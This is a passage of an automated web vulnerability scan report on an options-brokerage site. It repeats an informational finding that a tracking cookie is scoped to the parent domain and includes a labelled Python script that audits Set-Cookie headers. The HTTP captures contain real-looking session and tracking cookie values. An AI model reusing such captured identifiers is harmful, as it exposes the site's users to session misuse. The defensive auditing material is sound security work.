Set-Cookie: TLTHID=31B1D3A64DF4DC0943400890177ABC2A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

GIF89a..-..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

9.66. http://www.optionsxpress.com/images/promo_unique/divider.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/divider.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/divider.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 788
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "e994b0df6692cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=FB0DC0464C7379B04E0F409D15B5A47F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.67. http://www.optionsxpress.com/images/promo_unique/live-help.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/live-help.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/live-help.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 1255
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57DCCA6044DEB5B2BAB532A38C7B950B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.68. http://www.optionsxpress.com/images/promo_unique/phone.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/phone.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/phone.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 878
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:1756"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C58C6E0B422823B29D0E0DB0C88C0490; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.69. http://www.optionsxpress.com/images/promo_unique/shadow.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/shadow.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/shadow.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 1812
Content-Type: image/png
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6B849C5246B01879A225D7A7A55F4F14; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

...[SNIP]...

9.70. http://www.optionsxpress.com/images/promos/allInOne.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/allInOne.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/allInOne.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 81935
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:48 GMT
Accept-Ranges: bytes
ETag: "a7e8b85b89e2cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D3B637A04BE2D0951ABF23BB3474971D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

...[SNIP]...

9.71. http://www.optionsxpress.com/images/promos/barronsBg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/barronsBg.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/barronsBg.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 21887
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:48 GMT
Accept-Ranges: bytes
ETag: "f776c25b89e2cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5A39822A4290C06155A8A3BDE9F228C2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:44 GMT

...[SNIP]...

9.72. http://www.optionsxpress.com/images/promos/chartC4c.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/chartC4c.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/chartC4c.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 42196
Content-Type: image/jpeg
Last-Modified: Mon, 14 Mar 2011 20:49:49 GMT
Accept-Ranges: bytes
ETag: "cb13eb5b89e2cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C1BC06414DC1E382D0B7728327B6D440; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT

...[SNIP]...

9.73. http://www.optionsxpress.com/images/promos/footer1Logo11.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/footer1Logo11.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/footer1Logo11.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=F0BBCF5640548A4582D4D091C08D7EEB

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=44A373974F212A3FA1D871B5ECDA6C2D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:47 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.74. http://www.optionsxpress.com/images/promos/kiplingerBg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/kiplingerBg.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/kiplingerBg.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 5677
Content-Type: image/png
Last-Modified: Tue, 29 Mar 2011 19:11:06 GMT
Accept-Ranges: bytes
ETag: "7311cdd45eecb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A384F4AE4CB576BE96F6A394642C1659; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT

...[SNIP]...

9.75. http://www.optionsxpress.com/images/promos/mainBottom.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/mainBottom.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/mainBottom.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 814
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:49 GMT
Accept-Ranges: bytes
ETag: "fbf72d5c89e2cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1C23A7D04D74A4E06208FF87FAE51FA5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

...[SNIP]...

9.76. http://www.optionsxpress.com/images/promos/toolsIcons.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/toolsIcons.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/toolsIcons.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 97261
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:50 GMT
Accept-Ranges: bytes
ETag: "7b6a7a5c89e2cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F0BBCF5640548A4582D4D091C08D7EEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT

.PNG (binary image/png body, non-printable bytes omitted)
...[SNIP]...
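The check behind this issue, written out as an added example: this is not code from the XSS.CX report or from the scanner that produced it. It parses a Set-Cookie header, decides whether the Domain attribute names a proper parent of the issuing host on DNS label boundaries, and records whether Secure and HttpOnly are present. The optionsxpress.com entries in SAMPLE are copied from the Set-Cookie headers in responses 9.76, 9.81 and 9.93 of this section; the example.test entry is constructed to exercise the flag detection.

```python
"""Flag Set-Cookie headers whose Domain attribute is a parent of the issuing host.

Added example: not code from the XSS.CX report or from the scanner that
produced it. The optionsxpress.com Set-Cookie values below are copied from
responses in this section; the example.test entry is constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class CookieFinding:
    host: str                 # Host header of the request that drew the response
    name: str                 # cookie name
    domain: Optional[str]     # Domain attribute as sent, or None for a host-only cookie
    parent_scoped: bool       # Domain is a proper parent of host
    secure: bool
    httponly: bool


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, object]]:
    """Split a Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased so 'Domain' and 'domain' compare equal;
    flag attributes such as Secure and HttpOnly map to True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value, attrs


def is_parent_domain(host: str, domain: str) -> bool:
    """True when `domain` is a proper parent of `host` on DNS label boundaries.

    A leading dot in the Domain attribute is ignored, as browsers do (RFC 6265).
    'xpress.com' is not a parent of 'www.optionsxpress.com', and a Domain equal
    to the host makes a domain cookie but not a parent-scoped one.
    """
    host = host.lower().rstrip(".")
    domain = domain.lower().lstrip(".").rstrip(".")
    if not domain or host == domain:
        return False
    return host.endswith("." + domain)


def audit_set_cookie(host: str, header_value: str) -> CookieFinding:
    """Apply the parent-domain check plus the Secure/HttpOnly flags to one header."""
    name, _, attrs = parse_set_cookie(header_value)
    domain = attrs.get("domain")
    domain_str = domain if isinstance(domain, str) else None
    return CookieFinding(
        host=host,
        name=name,
        domain=domain_str,
        parent_scoped=domain_str is not None and is_parent_domain(host, domain_str),
        secure=attrs.get("secure") is True,
        httponly=attrs.get("httponly") is True,
    )


# (host, Set-Cookie value). The first three are copied from responses 9.76,
# 9.81 and 9.93 in this section; the last is constructed for contrast.
SAMPLE: List[Tuple[str, str]] = [
    ("www.optionsxpress.com", "TLTHID=F0BBCF5640548A4582D4D091C08D7EEB; Path=/; Domain=.optionsxpress.com"),
    ("www.optionsxpress.com", "TLTHID=B7B8CAE441A79F28A820CD92711B9316; Path=/; Domain=.optionsxpress.com"),
    ("www.optionsxpress.com", "TLTHID=107E93BD465512E40B5A70B74A34183A; Path=/; Domain=.optionsxpress.com"),
    ("www.example.test", "sid=constructed; Path=/; Secure; HttpOnly"),
]


def parent_scoped_findings(sample: List[Tuple[str, str]] = SAMPLE) -> List[CookieFinding]:
    """Return only the cookies that would be reported under this issue."""
    return [f for f in (audit_set_cookie(h, v) for h, v in sample) if f.parent_scoped]


if __name__ == "__main__":
    for f in parent_scoped_findings():
        print(f"{f.host}: {f.name} scoped to {f.domain} "
              f"(secure={f.secure}, httponly={f.httponly})")
```

TLTHID takes a new value on every response in this section, including the 404s in 9.81 and 9.84, which is consistent with a per-request tracking identifier rather than a session token and is why the report rates the issue Information. The practical exposure of the .optionsxpress.com scope is that every host under that domain receives the cookie and can set a cookie of the same name for the parent domain; and since no Secure attribute is present, it also travels over plain HTTP.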

9.77. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/whiteboard_sales_lp.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/whiteboard_sales_lp.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 75357
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 21:31:39 GMT
Accept-Ranges: bytes
ETag: "e0fcb87cd99cc1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=52B8D84540D59FC59A4222A431C2EF7C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

.PNG (binary image/png body, non-printable bytes omitted)
...[SNIP]...

9.78. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_glass_65_ffffff_1x400.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_glass_65_ffffff_1x400.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6B7B91FF4BEF93129C8300900562EEEA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:12 GMT

.PNG (binary image/png body, 105 bytes, ends with IEND; non-printable bytes omitted)

9.79. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 127
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8A4FC8934AA82ABB3628E1AE3BB7B02A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

.PNG (binary image/png body, 127 bytes, ends with IEND; non-printable bytes omitted)

9.80. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_highlight-soft_50_125697_1x100.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com, issued by www.optionsxpress.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_highlight-soft_50_125697_1x100.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
